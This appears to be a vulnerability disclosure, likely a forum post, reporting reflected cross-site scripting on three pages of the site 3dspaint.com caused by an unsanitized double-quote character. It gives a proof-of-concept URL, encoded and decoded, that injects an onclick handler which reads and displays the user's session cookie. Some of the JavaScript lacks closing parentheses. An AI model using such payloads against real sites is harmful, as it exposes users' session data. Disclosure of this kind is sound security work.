These pages /blogsearch.php, /blog/composer.php and /forum/search.php all do not sanitize '"' character which allows an attacker to run JavaScript in the user's browser by tricking the user into clicking their malicious link pointing to their malicious redict site and submitting a forum with the exploit payload in it directed at any of the above sections.
Blog Search POC: [a]https://3dspaint.com/blogsearch.php?title=Click%20me!%22%20onclick=%22let%20afterUserInfo=document.getElementsByClassName('menu_section'%5B0%5D.parentNode;%20let%20cookieStr='Your%20session%20info%20is:'.concat(document.cookie);%20let%20h1=document.createElement('h1';%20let%20div=document.createElement('div';h1.innerText='Your%20Cookie';div.style.backgroundColor='purple';div.style.color='pink';div.style.fontSize='18px';div.style.overflow='scroll';div.style.marginLeft='15px';div.style.marginRight='15px';div.style.borderRadius='10px';div.innerText=cookieStr;afterUserInfo.insertBefore(h1,%20afterUserInfo.children%5B2%5D);afterUserInfo.insertBefore(div,%20afterUserInfo.children%5B3%5D);this.value='';this.onclick=null;[/a]
(link will need to be manually copy and pasted into browser to view the results)
Source code:https://3dspaint.com/blogsearch.php?title=Click me!" onclick="let afterUserInfo=document.getElementsByClassName('menu_section'[0].parentNode; let cookieStr='Your session info is:'.concat(document.cookie); let h1=document.createElement('h1'; let div=document.createElement('div';h1.innerText='Your Cookie';div.style.backgroundColor='purple';div.style.color='pink';div.style.fontSize='18px';div.style.overflow='scroll';div.style.marginLeft='15px';div.style.marginRight='15px';div.style.borderRadius='10px';div.innerText=cookieStr;afterUserInfo.insertBefore(h1, afterUserInfo.children[2]);afterUserInfo.insertBefore(div, afterUserInfo.children[3]);this.value='';this.onclick=null;